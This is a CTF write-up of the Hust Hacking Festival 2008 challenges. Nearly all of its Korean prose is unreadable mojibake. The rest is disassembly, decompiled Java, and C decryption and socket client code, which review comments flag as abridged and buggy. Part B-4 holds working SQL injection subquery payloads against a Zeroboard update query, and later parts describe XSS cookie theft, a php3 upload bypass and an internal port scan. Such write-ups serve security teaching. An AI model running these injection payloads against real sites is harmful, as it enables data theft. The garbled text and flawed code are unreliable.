=====================================
< Hust Hacking Festival 2008 Report >



by hkpco()
-------------------------------------
mail     - hkpco@korea.com
homepage - http://hkpco.kr/
group    - wowhacker team
=====================================
ȸ  ̵ - newheart
-------------------------------------


"I am so sorry!"

ȸ ڴ  Ի ϰ ߰߰ ũ  ð Ǿ  ȸ Ⱓ  ʹ   ſ
  ۿ  ߽ϴ. ٳ    Ͽ 캸ٰ ߰ ۽ ̷ ڴ  ϰ
 п α      ϴ. ȸ      Ź帳ϴ.



Part A - 1

Ư    д Դϴ.    ϸ level 1 ~ 5  ư ֽϴ.
level1 Ǿ н尡     ִµ,   level5 Ǿֱ  ̸ ؾ մϴ.
level2     level1   ٲ  ֵ Ǿ ֱ  ٸ  մϴ.
Ϲ Խ ̱淡 XSS  Ű Ȥ  ų, CSRF  Ͽ Ư    õϵ
  ó   ʾҽϴ. پ          üũ ڵ带 
  ־ϴ.

--
// Level gate: the page branches on $level, anything below 2 takes the first branch.
// NOTE(review): the check is only as strong as where $level comes from — if it is
// derived from a request parameter or a client-writable cookie rather than
// server-side session state, the gate can be bypassed without touching this code.
if( $level < 2 ) {
	echo " ";
}

else {
	echo " ";
}
--


, ǹ ߸   level 1 ƴϾ         Դϴ.
    Ͻø Ͽ   1 Ϸ    Ͽ н带 ȹ  ־ϴ.





Part A - 2

ؽƮ   ȣȭ ִ  ̳ʸ ̸  ȣȭ  н  ־ϴ.
Ư   ָ ȣȭ    Ͽ ȣ  ݴϴ.
ش ȣȭ ƾ WriteFile() API  Ͽ ã  ־ϴ.  ϴ(ּ ߰).

--
.text:004014B9                 mov     ecx, ebp        ; ecx = file size
.text:004014BB                 sub     edx, ebp
.text:004014BD                 mov     edi, esi        ; edi = filesize
.text:004014BF
.text:004014BF loc_4014BF:                             ; CODE XREF: .text:004014D9j
.text:004014BF                 mov     al, [edx+ecx]   ; al = edx+ecx
.text:004014BF                                         ; ecx -> cnt
.text:004014BF                                         ; edx -> plain text
.text:004014BF                                         ;
.text:004014C2                 xor     al, bl          ; al = al ^ bl
.text:004014C4                 mov     [ecx], al       ; [ecx] = al;
.text:004014C6                 and     eax, 0FFh       ; eax = eax & 0xff
.text:004014CB                 shr     ebx, 8          ; ebx = ebx >> 8
.text:004014CE                 mov     eax, dword_4190B0[eax*4] ; eax = 4190b0[eax*4]
.text:004014D5                 xor     ebx, eax        ; ebx = ebx ^ eax
.text:004014D7                 inc     ecx             ; ecx++
.text:004014D8                 dec     edi             ; edi--
.text:004014D9                 jnz     short loc_4014BF ; al = edx+ecx
.text:004014D9                                         ; ecx -> cnt
.text:004014D9                                         ; edx -> plain text
--


xor ϴ°    Ű ̺  ּҿ ˴ϴ.

--
004190B0  00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99  ....?w,aQ.
.
.
.
--


ȣ ƾ C Ÿ  ϴ.

--
#define MAX 4096

/*
 * C reconstruction of the loop at .text:004014BF.
 *
 * A 32-bit state (`ebx`, seeded with the constant below) drives a byte-wise
 * keystream: each input byte is XORed with the low byte of the state, then the
 * state advances from a 256-entry dword table indexed by the byte just
 * produced, i.e. ebx = (ebx >> 8) ^ table[byte].  The first entries dumped at
 * 004190B0 (0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA) are the leading
 * entries of the standard CRC-32 lookup table, so this appears to be a CRC-32
 * register used as a keystream; the secret is just its 32-bit initial value.
 *
 * NOTE(review): the listing is abridged.  As shown, `str` is never filled
 * from stdin even though the program is invoked as `./hk_dec < password.txt`,
 * so the read of the ciphertext is missing here.
 */
int main( void )
{
	int cnt;
	char ch;		/* NOTE(review): plain char may be signed; for bytes >= 0x80
				 * `ch*4` below goes negative and indexes before x_table (UB).
				 * unsigned char would match the asm's `and eax, 0FFh`. */
	char str[MAX];		/* ciphertext buffer (see note above about filling it) */
	char x_table[] =	/* raw bytes of dword_4190B0 */
        { 0x00, 0x00, 0x00, 0x00, 0x96, 0x30, 0x07, 0x77 ..
	...
	...
	...
	};

	unsigned long ebx = 0xA9D4FB79;	/* initial state, i.e. the key */

	for( cnt = 0 ; cnt < MAX ; cnt++ )
	{
		ch = str[cnt];

		ch = ch ^ (ebx&0xff);		/* xor al, bl */
		printf( "%c", ch );
		fflush(stdout);

		ebx = ebx >> 8;			/* shr ebx, 8 */
		/* NOTE(review): the asm loads a 32-bit entry
		 * (mov eax, dword_4190B0[eax*4]) but x_table is a char array, so
		 * this picks only the low byte of the entry and the other three
		 * bytes never reach ebx. */
		ch = x_table[ch*4];
		ebx = ebx ^ ch;			/* xor ebx, eax */
	}

	return 0;
}
--


xor     ϰ Ǹ   ƿ Ư¡ ֽϴ. ׷ ȣȭ ƾ Ͽ  ȣȭ
ƾ ۼ ʿ䰡 ϴ.  ־  ȣȭ Ͽ   н带   ֽϴ.

--
[hkpco@hkpco HUST]$ ./hk_dec < password.txt
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&

           : 38d9587b9be0bd19be5dcb109f023504

!@%!@!@#^*!@#^(!@^(!@)^!@^!@^(!^$%($^#$^%(%#^(%#(^^#(@%#(^@%^
$(_(*^%$$%*()($#$%^&*()&^%$#$%^&*)(*&^%$%^&*((*&%$#$%^&*()(**
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
--





Part A - 3

sQuest.jar ̶  ־ ڹٷ ۼ   ҽϴ. ִ  Ǯ ڹ Ϸ ̿Ͽ
ڵ带 캸  Client.class Ͽ       ־ϴ.

--
.
.
    public Client()
    {
        Socket socket1;
        socket1 = null;
        try
        {
            socket1 = new Socket("220.95.152.32", 9000);
            DataInputStream datainputstream = new DataInputStream(socket1.getInputStream());
            DataOutputStream dataoutputstream = new DataOutputStream(socket1.getOutputStream());
            BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(System.in));
            (new ListenThread(datainputstream)).start();
            System.out.println("ready!!");
            do
            {
                String s = bufferedreader.readLine();
                if(s.equalsIgnoreCase("quit"))
                    System.exit(0);
.
.
.
--


 ּҴ 220.95.152.32 ̸ Ʈ 9000 ̾ϴ.  Ͽ ڿ  Ư Ģ ڵ Ǿµ
 ۾̱     ڿ εǴ ڸ ã ϴ.

--
A -> C
B -> E
C -> H
D -> L
E -> K
.
.
V -> G
W -> B
X -> O
Y -> S
Z -> V
--


 ϸ ڵ  ڿ Ǵ ұĢ 7bytes Ʈ  ִµ,
̿   ٽ ϸ     ϰ    ڵ Ͽϴ.

--
/*
	hkpco
	ChanAm Park
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

int sock_conn( char **argv );
int err( char *msg );

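int main( int argc , char **argv )
{
	/*
	 * Challenge client: connect to argv[1]:argv[2], read the greeting,
	 * map the seven substituted letters that follow a 7-byte prefix back
	 * through the fixed substitution alphabet, send the recovered key and
	 * print the server's reply.
	 *
	 * Returns 0 on success, -1 on bad usage or a too-short greeting;
	 * socket errors terminate the process via sock_conn()/err().
	 */
	int sockfd;
	char buffer[1024] = {0x00,};
	char *p = buffer;
	/* Substitution alphabet: plaintext letter 'A'+i is transmitted as table[i]. */
	static const char table[] =
	{'C','E','H','L','K','M','A','Y','T','D','X','R','Z',
	 'U','I','Q','N','P','J','F','W','G','B','O','S','V'};
	enum { PREFIX_LEN = 7, KEY_LEN = 7 };

	char key[16] = {0x00,};

	ssize_t n;
	int cnt;
	size_t cnt_in;

	if( argc < 3 ) {
		fprintf( stderr, "%s [server] [port]\n", argv[0] );
		return -1;
	}

	sockfd = sock_conn( argv );

	/* Read one byte less than the buffer so the greeting is always
	 * NUL-terminated before it is handed to %s. */
	n = read( sockfd, buffer, sizeof(buffer) - 1 );
	if( n < 0 )
		err( "read()" );
	buffer[n] = '\0';
	/* The key bytes are taken from offsets 7..13; never index past what
	 * was actually received. */
	if( n < PREFIX_LEN + KEY_LEN ) {
		fprintf( stderr, "short greeting: %zd bytes\n", n );
		close( sockfd );
		return -1;
	}
	printf( "%s\n", buffer );
	printf( "%s\n", p+PREFIX_LEN );

	for( cnt = 0 ; cnt < KEY_LEN ; cnt++ )
	{
		for( cnt_in = 0 ; cnt_in < sizeof(table) ; cnt_in++ )
		{
			if( p[PREFIX_LEN+cnt] == table[cnt_in] ) {
				printf( "%c\n", (int)('A'+cnt_in) );
				key[cnt] = (char)('A'+cnt_in);
				break;	/* every letter occurs once in table */
			}
		}
		/* A byte not in the alphabet leaves key[cnt] == 0 and
		 * truncates the key at that position (same as before). */
	}
	printf( "key: %s\n", key );

	if( write( sockfd, key, strlen(key) ) < 0 )
		err( "write()" );
	memset( buffer, 0x0, sizeof(buffer) );

	n = read( sockfd, buffer, sizeof(buffer) - 1 );
	if( n < 0 )
		err( "read()" );
	buffer[n] = '\0';
	printf( "last rcv: %s\n", buffer );

	close(sockfd);
	return 0;
}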

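int sock_conn( char **argv )
{
	/*
	 * Open a TCP connection to argv[1] (host name or dotted address) on
	 * port argv[2] and return the connected descriptor.  Every failure
	 * path terminates the process (err() or exit()), so a return value
	 * is always a live socket.
	 */
	int sockfd;
	struct sockaddr_in sock;
	struct hostent *host_st;
	char *end;
	long port;

	/* Reject junk or out-of-range ports instead of silently taking
	 * atoi()'s 0 (a LONG_MIN/LONG_MAX overflow fails the range test). */
	port = strtol( argv[2], &end, 10 );
	if( end == argv[2] || *end != '\0' || port < 1 || port > 65535 ) {
		fprintf( stderr, "invalid port: %s\n", argv[2] );
		exit(-1);
	}

	sockfd = socket( PF_INET, SOCK_STREAM, 0 );
	if( sockfd < 0 )
		err( "socket()" );

	host_st = gethostbyname( argv[1] );
	if( host_st == NULL )
		err( "gethostbyname()" );
	/* sockaddr_in only holds an IPv4 address of exactly sin_addr's size. */
	if( host_st->h_addrtype != AF_INET
	    || host_st->h_length != (int)sizeof(sock.sin_addr) ) {
		fprintf( stderr, "gethostbyname(): no IPv4 address for %s\n", argv[1] );
		exit(-1);
	}

	/* Zero the whole struct (not only sin_zero) and copy the address
	 * with memcpy rather than through a possibly misaligned cast. */
	memset( &sock, 0, sizeof(sock) );
	sock.sin_family = AF_INET;
	sock.sin_port = htons( (unsigned short)port );
	memcpy( &sock.sin_addr, host_st->h_addr, sizeof(sock.sin_addr) );

	if( connect( sockfd, (struct sockaddr *)&sock, sizeof(sock) ) < 0 )
		err( "connect()" );

	return sockfd;
}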

int err( char *msg )
{
	/* Report `msg: <errno text>` on stderr and terminate with a failure
	 * status.  Callers rely on this never returning. */
	perror( msg );
	exit( -1 );
	return -1;	/* not reached; keeps the int signature explicit */
}
--


  NEXT : solution ̶ ޽ ޹  ־      н尡 Ǿϴ.





Part A - 4

Ajax ڵ   ü  ־ϴ. ׷  Ͻ÷ Ȯ   ü ư ŬϿ ü ж
â    submit ̷ ʴ    ־ϴ.   ҽ ڵ带  JScript.Encode Ǿ
ֱ   ҽ ڵ带   µ, ̴ پ ̳ 󿡼 ϴ ڵ 񽺸 ̿ϸ  ȣȭ
  ֽϴ.  ü  submit ڵ  ϴ.

--
<FORM METHOD=POST ACTION="makgurlri.php" NAME="fInput">
<TR height="30">
<TD width="150">&nbsp;</TD>
<TD>&nbsp;</TD>
</TR>
.
.
<TR height="30">
<TD colspan="2" align="center"><INPUT TYPE="submit" VALUE="         " onClick="fcInputBtn();"></TD>
</TR>
</FORM>
--


ư Ŭϸ fcInputBtn(); ȣǸ ش ڵ  ϴ.

--
// Runs from the submit button's onClick, before the form is submitted: it
// swaps the form's target from the makgurlri.php declared in the markup to
// chivasRegal.html and then shows a message.
// NOTE(review): the real destination is decided client-side here, so the
// ACTION attribute in the HTML is advisory only — a request can be sent to
// either URL regardless of what this handler does.
function fcInputBtn()
{
	document.fInput.action = 'chivasRegal.html';
	window.alert('ü !');
}
--


 makgurlri.php chivasRegal.html action ٲپ ִ°     form action  chivasRegal.html
Ͽ submitǵ Ͽϴ. ð  ɸ   н  ־ ª ð ٲ
ó   ִ       ڵ带 ۼϿ, ᱹ ̷ ۾ ʿ ʴٴ
 ˰ԵǾϴ. Ŷ ĸ  н带 ִ  ԵǾ ־ ڿ Է ޴ 
н OPT  ƹ  ° ϴ. н "By doubting we come at the truth" Դϴ.





Part B - 1

, , , иʸ ǥ ִ Ÿ̸Ӱ    ϴ  ̳ʸ ־ϴ.
ollydbg 캻   ð      ƽϴ(ollydbg  ڵ).

--
.
.
0040163E   > \BF 3C000000   mov edi, 3C                              ;  Default case of switch 004015EA
00401643   >  8B4E 70       mov ecx, dword ptr ds:[esi+70]
00401646   .  B8 74000000   mov eax, 74
0040164B   .  3BC8          cmp ecx, eax
0040164D   .  75 1D         jnz short timer.0040166C
0040164F   .  837E 74 70    cmp dword ptr ds:[esi+74], 70
00401653   .  75 17         jnz short timer.0040166C
00401655   .  837E 78 72    cmp dword ptr ds:[esi+78], 72
00401659   .  75 11         jnz short timer.0040166C
0040165B   .  3946 6C       cmp dword ptr ds:[esi+6C], eax
0040165E   .  75 0C         jnz short timer.0040166C
00401660   .  53            push ebx
00401661   .  53            push ebx
00401662   .  68 50304000   push timer.00403050                      ;  ASCII "You are around solution"
00401667   .  E8 D2040000   call <jmp.&MFC42.#1200>
.
.
.
--


Ÿ̸ ð   ϸ   ƾ ġ ˴ϴ(ida  ڵ).

--
.text:00401280 sub_401280      proc near               ; DATA XREF: .rdata:004025ACo
.text:00401280
.text:00401280 arg_0           = dword ptr  4
.text:00401280
.text:00401280                 push    esi
.text:00401281                 mov     esi, ecx
.text:00401283                 push    edi
.text:00401284                 mov     edi, [esp+8+arg_0]
.text:00401288                 lea     eax, [esi+6Ch]
.text:0040128B                 push    eax
.text:0040128C                 push    3EDh
.text:00401291                 push    edi
.text:00401292                 call    ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:00401297                 lea     ecx, [esi+70h]
.text:0040129A                 push    ecx
.text:0040129B                 push    3E8h
.text:004012A0                 push    edi
.text:004012A1                 call    ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:004012A6                 lea     edx, [esi+74h]
.text:004012A9                 push    edx
.text:004012AA                 push    3EBh
.text:004012AF                 push    edi
.text:004012B0                 call    ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:004012B5                 lea     eax, [esi+78h]
.text:004012B8                 push    eax
.text:004012B9                 push    3ECh
.
.
.
--


  Ÿ̸ ð DDX_Text ڷ ޵Ǵµ, Լ ȣ  ƴ  ° (Ʈ Ʈ ID) 
ƽŰ ڵ带 ϸ "tprtlgyflsla" ̶ ڿ    ̰ н尡 ˴ϴ.





Part B - 2

Ʈ  ־,     ̹   н带 Ÿ ִ° ϴ.
̴     Ͽ ִ ޸  ׸ ϸ Ǹ  Ͽ  н尡
ª ð   ھ            ڵ
ĥ  Ƿ ̴   δ  ϴ. ӿ ־ ׸      ϴ.

--
02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00
.
.
.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02
--


Ű  ھ Ÿ ̸   "BE5tP4SVxA5Lki18"  н带   ֽϴ.





Part B - 3

   ȭ ũ  ָ ̸  н带 ˾Ƴ° Դϴ.
root  н hash  ԵǾ ־,  Ǵ ý   ũ
񽺸 Ͽ ȣȭ   ־ϴ. н, "CAFEamericano!!"





Part B - 4

κ Խ 3 б 2 ϴ  ־ϴ.
б write_ok.php    Ǵ $del_queX  ϸ   
 κ php ڵ  ϴ.

--
// SQL sink: every $variable below is interpolated straight into the query
// text, and $del_que1 / $del_que2 are spliced in as raw SQL fragments rather
// than quoted values — whoever controls them controls the rest of the UPDATE.
// Mitigation: build those fragments only from a server-side whitelist and pass
// the column values through escaping or bound parameters.
@mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no',
child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email',
homepage='$homepage',subject='$subject',memo='$memo',sitelink1='$sitelink1',sitelink2='$sitelink2',
use_html='$use_html',reply_mail='$reply_mail',is_secret='$is_secret',
category='$category' $del_que1 $del_que2 where no='$no'") or error(mysql_error());
--


⼭   κ $del_que1 ̿Ͽ  õϿϴ.
б     ֽϴ.

--
, memo=(select memo from zetyx_board_bOarD_1 where no=Խñ۹ȣ) 
--


  б   "TABLE NAME", "721f214d3c9de37d58a5b38c55e651c7" ̾, ο  õؾ ϴ°
ϴ. ش  ̿Ͽ information_schema db 캻  721f214d3c9de37d58a5b38c55e651c7 ̺ ϴ
database ̸ ˾Ƴ  ־ϴ. 721f214d3c9de37d58a5b38c55e651c7 ̺ ϴ db ̸ bIgBaNG ̸, 
÷ ̸ P, A, SS, W, O, R, D     ֽϴ.  ʵ尪   Ͽϴ.

--
, memo=(select P from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select A from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select SS from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select W from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select O from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select R from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
, memo=(select D from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7) 
--


̷   ڿ ϸ "m@ket0d4yth3b3Std@y0fy0Url!F3" н带   ֽϴ.





Part C - 1

Ʈũ ƴٴϴ Ŷ ĸ  ̴ 16 ڵ ־ϴ.
 κ Ǵ  ڷ Ÿ  ִ  ӵ 16  ̸  ڷ
ȯϸ "PASS qksrkqtmqslek"  ڿ   ֽϴ. н, "qksrkqtmqslek" Դϴ.





Part C - 2

Խ ־  ǥ  "̰  ³??"      Ͽϴ.
Ǯ̴  XSS Ͽ ǰ Ŀ  Ͽ   ð ɷȴ  ˴ϴ.
XSS ༺ ǵ  ڵȭ ۾  ƾ ϴµ ׷ Ѱ    ޱⰡ 
ϴ. ׸ Ϲ ڵ    ־  XSS  document.cookie    Ͽ
  ڼ ־    Ϲ  ǰ  ·  ұ   
 ϴ. Ϲ ڰ Խñ   ΰų   ¸  Ưϰ  ξ
ϴ ƽ  ҽϴ. ƹư, Խñ   XSS ڵ带 ͸    ִ  Ͽ 
   ־ ش   Խñ Ͽ н带 ȹ  ־ϴ.





Part C - 3

Ŷ ĸ  aracode.pcap ־ϴ.
wireshark  캻  FTP  ̷    ־, Ͱ    Ϸ Ͽ
н尡    ΰ   ־ϴ.   Ͽ н尡 ɷ־  ̸ Ǯ
ߴµ, ܼ   δ ˾Ƴ  ϴ. ׷ Advanced ZIP Password Recovery  ̿Ͽ
  ̿     н带 ½ϴ.  Ǯ ؽƮ  ϳ ׸  ϳ
ϴµ, ؽƮ Ͽ  ڸ ׸ Ͽ ִ ƽŰ ڵǥ Ͽ ڸ   "woongkang" ̶
н带   ֽϴ.





Part C - 4

  ۵ Ʈ ־ϴ.
Խ  ε ༺ ̿Ͽ php3  Ȯڷ php  ε  , ε 丮 ؼ  
ȹ  ֽϴ. ߰ Խ db    Ƿ  sql     Ͽϴ.
    ƹ   н õ ͸ ã      ִ 
ǴϿϴ. ifconfig  ̿Ͽ 192.168.200.10   ã  ־  캻   
ȹ   °   ־ϴ. ׷    ipscan  Ե ĳʸ ̿Ͽ
  Ͽ 192.168.200.11   Ѵٴ  ˾Ƴ  ־ϴ.  Ʈ ĵ Դϴ.

--
hkscan -> portscan -> 192.168.200.11

loc-srv [135]
NoName [3389]
--


Windows RPC 񽺷 Ǵ 135 Ʈ,    Ʈ Ǵ 3389 Ʈ ִ  ȮϿϴ.
Ʈ  Ͽ ٸ  Ǯ̶  ̷, Ŀ Ʈ ̷(ߴͰ  ǵ)̶
Ʈ Ǿϴ.  1ð ܵΰ   Ʈ ̷ ϴ  ãٰ Ͽ ssh ͳθ
õϴ ߿ ȸ ϴ.